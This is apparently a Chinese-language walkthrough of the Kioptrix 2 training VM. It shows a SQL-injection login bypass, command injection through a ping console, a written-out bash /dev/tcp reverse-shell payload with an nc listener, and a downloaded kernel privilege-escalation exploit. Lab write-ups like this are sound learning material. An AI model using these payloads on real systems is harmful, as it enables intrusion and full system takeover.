主机探测
确认目标靶机IP为:192.168.3.153
也可以用nmap探测网段
服务发现
开启的服务还挺多,apache的版本比KIOPTRIX: 1高了不少
打开http服务查看
就是一个登陆框,在usename构造
admin ' #
sql注入绕过,得到一个web console输入百度的网址,得到ping结果
尝试
www.baidu.com | ls
看看是否可以执行任意命令可以执行。ok,我们尝试构造一个shell,方便后面的渗透
尝试在当前目录写入一句话php木马,发现用户组没有写权限
尝试用nc构造一个反弹shell,发现好像无法反弹。。
于是谷歌了一下,看看还有什么反弹方法,在网上找到一个方法:
1,在kali开启监听
nc -lvp 4444
2,在网页执行命令
w||bash -c "bash -i >& /dev/tcp/192.168.3.67/4444 0>&1"
直接反弹了一个bash
提权
查看内核版本
谷歌搜索此内核版本的提权脚本
选择第一条,从靶机wget到本地
按脚本注释提示操作,执行,得到一个root shell
总结
学习机,别想太复杂就行。。。